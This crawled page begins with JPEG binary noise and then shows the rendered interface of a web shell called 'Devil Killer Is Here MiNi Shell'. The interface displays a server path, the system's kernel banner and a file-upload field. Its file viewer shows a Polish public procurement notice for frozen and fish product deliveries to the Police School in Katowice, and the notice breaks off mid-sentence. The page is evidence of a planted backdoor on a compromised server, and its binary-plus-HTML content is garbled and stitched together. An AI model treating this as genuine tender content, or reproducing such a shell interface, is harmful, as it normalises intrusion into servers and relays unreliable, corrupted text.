JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211115/0026872701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawy produktów mrożonych oraz produktów rybnych do Szkoły Policji w Katowicach na okres 3 miesięcy 2022 r. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szkoła Policji w Katowicach</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 276676775</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Gen. Jankego 276</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Katowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">40-684</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">47 8516441</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zam.pub@spkatowice.policja.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://katowice.szkolapolicji.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Państwowa jednostka organizacyjna </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Szkolenie Policji </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawy produktów mrożonych oraz produktów rybnych do Szkoły Policji w Katowicach na okres 3 miesięcy 2022 r. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1a598a37-43b5-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00268727</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00017602/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.8 Dostawy: 1. Produktów mrożonych; 2. Produktów rybnych.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/sp_katowice/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/sp_katowice/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Przedmiotowe postępowanie prowadzone jest w języku polskim, przy użyciu środków komunikacji elektronicznej, za pośrednictwem platformy zakupowej pod adresem: https://platformazakupowa.pl/pn/sp_katowice/proceedings.<br/>2. Zamawiający preferuje w szczególności przesyłanie danych w formacie pdf.<br/>3. Zamawiający dopuszcza, opcjonalnie, komunikację za pośrednictwem poczty elektronicznej. Adres poczty elektronicznej osoby uprawnionej do kontaktu z Wykonawcami: zam.pub@spkatowice.policja.gov.pl.<br/>4. Zamawiający, zgodnie z § 11 ust. 2 Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (t.j. Dz. U. z 2020 r. poz. 2452), zwanym dalej<br/>Rozporządzeniem w sprawie środków komunikacji, określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na platformie zakupowej tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) komputer klasy PC lub MAC o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>3) zainstalowana dowolna przeglądarka internetowa, w przypadku Internet<br/>Explorer minimalnie wersja 10.0;<br/>4) włączona obsługa JavaScript;<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf;<br/>6) platformazakupowa.pl działa według standardu przyjętego w komunikacji sieciowej - kodowanie UTF8;<br/>7) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.<br/>5. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z platformy zakupowej określone w Regulaminie zamieszczonym na stronie internetowej<br/>ttps://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin&#34; oraz<br/>uznaje go za wiążący.<br/>6. Zamawiający informuje, że instrukcje korzystania z platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:https://platformazakupowa.pl/strona/45-instrukcje<br/>7. Pozostałe szczegółowe wymagania techniczne opisane są w rozdziale IV i XVI SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Pouczenie wynikające z art. 13 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. U. UE L 119).<br/>Informujemy, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Komendant Szkoły Policji w Katowicach z siedzibą przy ul. gen. Zygmunta Waltera-Jankego 276, 40-684 Katowice.<br/>2. Inspektorem ochrony danych osobowych jest Kierownik Sekcji Ochrony Informacji Niejawnych i Kontroli, adres e-mail: iod.sp@spkatowice.policja.gov.pl, tel. 47 85 16 430.<br/>3. Pani/Pana dane osobowe będą przetwarzane w celu/ celach przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego oraz realizacji tego zamówienia.<br/>4. Podstawą prawną przetwarzania dotyczących Pani/Pana danych osobowych jest ustawa Pzp.<br/>5. Odbiorcą Pani/Pana danych osobowych może być Urząd Zamówień Publicznych, ponadto w zakresie określonym w ustawie Pzp, dane mogą być publikowane na stronie internetowej http://katowice.szkolapolicji.gov.pl/ oraz innym podmiotom uprawnionym na podstawie odrębnych przepisów.<br/>6. Pani/Pana dane nie będą przekazywane do państwa trzeciego, organizacji międzynarodowej.<br/>7. Okres przechowywania Pani/Pana danych osobowych wynika z przepisów dotyczących okresów przechowywania akt w Policji.<br/>8. Posiada Pani/Pan prawo żądania od Administratora dostępu do danych dotyczących Pani/Pana osoby, sprostowania, ograniczenia przetwarzania i wniesienia sprzeciwu wobec przetwarzania danych osobowych w zakresie określonym przepisami prawa.<br/>9. Ma Pani/Pan prawo wniesienia skargi do organu nadzorczego, którym jest Prezes Urzędu Ochrony Danych Osobowych.<br/>10. Podanie danych jest wymogiem ustawowym.<br/>11. W przypadku niepodania danych nie będzie możliwy udział w postępowaniu o udzielenie zamówienia publicznego.<br/>12. Pani/Pana dane osobowe nie podlegają zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu.<br/>13. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego lub konkursu.<br/>14. W przypadku gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 rozporządzenia 2016/679, wymagałoby niewspółmiernie dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających w szczególności na celu sprecyzowanie<br/>nazwy lub daty zakończonego postępowania o udzielenie zamówienia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">21/ZP/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są „„Dostawy produktów mrożonych do Szkoły Policji w Katowicach na okres 3 miesięcy 2022 r.”<br/>Szczegółowy opis przedmiotu zamówienia:<br/>Pełny wykaz asortymentu będącego przedmiotem dostaw oraz maksymalna ilość zamawianych produktów została podana w specyfikacji asortymentowo-ilościowo- wartościowej stanowiącej załącznik nr 1A do SWZ. <br/>UWAGA !!<br/>Niewypełnienie kolumny nr 3 ww. specyfikacji (dotyczy załącznika 1A) lub zaproponowanie produktów niezgodnych z wymaganiami Zamawiającego, równoznaczne będzie z odrzuceniem oferty Wykonawcy na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp – jako niezgodnej z warunkami zamówienia.<br/>3)	W celu potwierdzenia, że oferowane dostawy dla części 1 i 2 odpowiadają określonym wymaganiom Zamawiający żąda od Wykonawcy złożenia wraz z ofertą kart produktów, lub innych dokumentów, z których będzie wynikał ich skład oraz spełnienie wymagań określonych przez Zamawiającego w Specyfikacji asortymentowo-ilościowo-wartościowej stanowiącej załącznik nr 1A i 1B do SWZ.<br/>4.	Ilości podane w Specyfikacjach asortymentowo-wartościowo-ilościowych stanowiących załączniki 1A i 1B do SWZ są ilościami szacunkowymi i nie zobowiązują Zamawiającego do zakupu produktów w tych ilościach.<br/>5.	Zamawiający zastrzega sobie możliwość niezrealizowania przedmiotu zamówienia o wartości do 50% łącznego wynagrodzenia brutto. Z tytułu niezrealizowania części zamówienia Wykonawcy nie przysługują żadne roszczenia finansowe oraz prawne.<br/>6.	Dostawa, rozładunek i wniesienie przedmiotu zamówienia realizowane będą na koszt Wykonawcy wkalkulowany w cenę produktów objętych umową o udzielenie zamówienia publicznego.<br/>7.	Dostawa przedmiotu zamówienia wykonywana będzie środkami transportu Wykonawcy dopuszczonymi do przewozu żywności.<br/>8.	Osoby wykonujące dostawę muszą legitymować się aktualnym orzeczeniem lekarskim dla celów sanitarno-epidemiologicznych, które okazują na żądanie Zamawiającego.<br/>9.	Wykonawca zobowiązany jest do posiadania aktualnego zaświadczenia o wpisie do rejestru zakładów podlegających urzędowej kontroli właściwych władz – zgodnie z ustawą z dnia 25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (t.j. Dz.U. z 2020 r., poz. 2021, z późn. zm.) lub aktualnej decyzji administracyjnej o wpisie do rejestru zakładów albo o zatwierdzeniu zakładu wydanej przez powiatowego lekarza weterynarii wraz z nadanym numerem identyfikacyjnym zgodnie z art. 21 ust. 4 ustawy z dnia 16 grudnia 2005 r. o produktach pochodzenia zwierzęcego (t.j. Dz.U. z 2020 r., poz. 1753 z późn. zm.). Wykonawca musi podlegać stałemu nadzorowi właściwych władz.<br/>10.	Oferowane produkty muszą spełniać wymagania wymienione w obowiązujących przepisach prawa dotyczącego produkcji i obrotu żywności. Każdy produkt musi być wyprodukowany i wprowadzony do obrotu zgodnie z wymogami systemu HACCP. <br/>11.	Szczegóły realizacji zamówienia określone zostały we wzorze umowy stanowiącym załącznik nr 4 do SWZ.<br/>12.	Wykonawca zapewni ochronę przekazywanych danych osobowych, zgodnie z ustawą z dnia 10 maja 2018 r. o ochronie danych osobowych (t.j. Dz.U. z 2019 r. poz. 1781) i Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych (dalej RODO) (t.j. Dz.U. UE L 2016 r. nr. 119 s. 1). Obowiązek poinformowania Podwykonawców, podmiotów trzecich i członków konsorcjum o przetwarzaniu danych osobowych spoczywa na Wykonawcy. Oświadczenie Wykonawcy o wypełnieniu obowiązków wynikających z art. 13 lub art. 14 RODO wobec osób fizycznych, od których dane osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o niniejsze zamówienie złożone zostanie w formularzu ofertowym – stanowiącym załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15331170-9 - Warzywa mrożone</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15311100-2 - Chipsy i frytki</p> <p class="mb-0">15313000-5 - Ziemniaki przetworzone</p> <p class="mb-0">15332400-8 - Owoce konserwowane</p> <p class="mb-0">15851220-6 - Ciasto makaronowe nadziewane</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.12.) Opis wznowienia</h3> Zamawiający przewiduje możliwość wznowienia zamówienia, polegającą na powtórzeniu<br/>przedmiotu zamówienia na okres kolejnych 3 miesięcy. W przypadku skorzystania przez<br/>Zamawiającego ze wznowienia zamówienia, Zamawiający poinformuje o tym pisemnie<br/>Wykonawcę, w terminie do 14 dni przed zakończeniem umowy. W przypadku<br/>niepoinformowania Wykonawcy o skorzystaniu przez Zamawiającego ze wznowienia<br/>zamówienia w terminie o którym mowa wyżej należy uznać, że Zamawiający nie będzie korzystał<br/>ze wznowienia. Wykonawcy nie będzie miał żadnych roszczeń w stosunku do Zamawiającego,<br/>w przypadku gdy Zamawiający ze wznowienia nie skorzysta. <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1)	Jedynym kryterium oceny ofert będzie cena.<br/>Cena =100%<br/>2)	Cena ofertowa brutto zamówienia – 100 pkt (UWAGA – kryterium podlegać będzie ocenie w toku aukcji elektronicznej):<br/>C - Ilość punktów =	najniższa oferowana cena oferty brutto<br/>z ważnych ofert/	cena brutto badanej oferty x 100 pkt<br/>2)	Wyznaczenie wartości punktów:<br/>a)	oferta z najniższą ceną z uwzględnieniem wyników aukcji elektronicznej otrzyma maksymalną liczbę punktów tj. 100 pkt,<br/>b)	inne oferty cenowe zostaną przeliczone wg powyższego wzoru,<br/>c)	jeżeli oferty cenowe po przeliczeniu wg powyższego wzoru będą sobie równe otrzymają taką samą liczbę pkt.<br/>2.	Zamawiający udzieli zamówienia Wykonawcy, który spełnia warunki udziału w postępowaniu, nie podlega wykluczeniu z postępowania (zgodnie z Rozdziałem VII i VIII niniejszej SWZ), oferta jego nie podlega odrzuceniu oraz który zaoferuje najniższą cenę za realizacje przedmiotu zamówienia<br/>3.	Oceny ofert dokona komisja przetargowa.<br/>4.	Po dokonaniu oceny ofert, Zamawiający zamierza przeprowadzić aukcję elektroniczną zgodnie z art. 308 ustawy Pzp.<br/>5.	Zamawiający przeprowadzi aukcję elektroniczną, jeżeli zostaną złożone co najmniej dwie oferty niepodlegające odrzuceniu.<br/>6.	Jeśli nie zostaną złożone co najmniej dwie oferty niepodlegające odrzuceniu, aukcja elektroniczna nie zostanie przeprowadzona, a oferta najkorzystniejsza zostanie wybrana spośród ofert, złożonych w odpowiedzi na ogłoszenie o zamówieniu.<br/>7.	W sytuacji, gdy dwie lub więcej oferty uzyskają jednakową maksymalną liczbę punktów w toku aukcji elektronicznej, Zamawiający wezwie Wykonawców do złożenia ofert dodatkowych w formie pisemnej.<br/>8.	Jeżeli w toku aukcji nie zostanie złożone żadne postąpienie, Zamawiający dokona wyboru najkorzystniejszej oferty spośród ofert pisemnych złożonych w odpowiedzi na ogłoszenie o zamówieniu.<br/>9.	Do obliczenia wartości punktowej złożonej oferty, w zakresie kryterium ceny w toku aukcji elektronicznej przyjmuje się następujący sposób obliczenia ceny przy spełnieniu poniższych warunków:<br/>1)	złożone zostały co najmniej dwie oferty;<br/>2)	została ustalona waga kryterium – wartość maksymalnej liczby punktów, jaka może być przyznana w ramach kryterium ceny.<br/>10.	Za ofertę najwyżej ocenioną zostanie uznana oferta, spośród złożonych, ważnych i niepodlegających odrzuceniu ofert, która uzyska największą ilość punktów na podstawie kryterium ceny.<br/>UWAGA<br/>W aukcji elektronicznej minimalne postąpienie w tym kryterium to 500 zł brutto.<br/>Licytowana cena będzie ceną brutto za realizację całego zamówienia.<br/><br/>UWAGA<br/>Jeżeli zostanie złożona oferta, której wybór prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z ustawą z dnia 11 marca 2004 r. o podatku od towarów i usług (t.j. Dz.U. z 2021 r. poz. 685, z późn.zm.), dla celów zastosowania kryterium ceny Zamawiający dolicza do przedstawionej w tej ofercie ceny kwotę podatku od towarów i usług, którą miałby obowiązek rozliczyć.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są „Dostawy produktów rybnych do Szkoły Policji w Katowicach na okres 3 miesięcy 2022 r.”<br/>2. Szczegółowy opis przedmiotu zamówienia:<br/>Pełny wykaz asortymentu będącego przedmiotem dostaw oraz maksymalna ilość zamawianych produktów została podana w specyfikacji asortymentowo-ilościowo- wartościowej stanowiącej załącznik nr 1B do SWZ.<br/>UWAGA !!<br/>Niewypełnienie kolumny nr 3 ww. specyfikacji (dotyczy załącznika 1B) lub zaproponowanie produktów niezgodnych z wymaganiami Zamawiającego, równoznaczne będzie z odrzuceniem oferty Wykonawcy na podstawie art. 226 ust. 1 pkt. 5 ustawy Pzp – jako niezgodnej z warunkami zamówienia.<br/>3. W celu potwierdzenia, że oferowane dostawy dla części 1 i 2 odpowiadają określonym wymaganiom Zamawiający żąda od Wykonawcy złożenia wraz z ofertą kart produktów, lub innych dokumentów, z których będzie wynikał ich skład oraz spełnienie wymagań określonych przez Zamawiającego w Specyfikacji asortymentowo-ilościowo-wartościowej stanowiącej załącznik nr 1A i 1B do SWZ.<br/>4.	Ilości podane w Specyfikacjach asortymentowo-wartościowo-ilościowych stanowiących załączniki 1A i 1B do SWZ są ilościami szacunkowymi i nie zobowiązują Zamawiającego do zakupu produktów w tych ilościach.<br/>5.	Zamawiający zastrzega sobie możliwość niezrealizowania przedmiotu zamówienia o wartości do 50% łącznego wynagrodzenia brutto. Z tytułu niezrealizowania części zamówienia Wykonawcy nie przysługują żadne roszczenia finansowe oraz prawne.<br/>6.	Dostawa, rozładunek i wniesienie przedmiotu zamówienia realizowane będą na koszt Wykonawcy wkalkulowany w cenę produktów objętych umową o udzielenie zamówienia publicznego.<br/>7.	Dostawa przedmiotu zamówienia wykonywana będzie środkami transportu Wykonawcy dopuszczonymi do przewozu żywności.<br/>8.	Osoby wykonujące dostawę muszą legitymować się aktualnym orzeczeniem lekarskim dla celów sanitarno-epidemiologicznych, które okazują na żądanie Zamawiającego.<br/>9.	Wykonawca zobowiązany jest do posiadania aktualnego zaświadczenia o wpisie do rejestru zakładów podlegających urzędowej kontroli właściwych władz – zgodnie z ustawą z dnia <br/>25 sierpnia 2006 roku o bezpieczeństwie żywności i żywienia (t.j. Dz.U. z 2020 r., poz. 2021, z późn. zm.) lub aktualnej decyzji administracyjnej o wpisie do rejestru zakładów albo o zatwierdzeniu zakładu wydanej przez powiatowego lekarza weterynarii wraz z nadanym numerem identyfikacyjnym zgodnie z art. 21 ust. 4 ustawy z dnia 16 grudnia 2005 r. o produktach 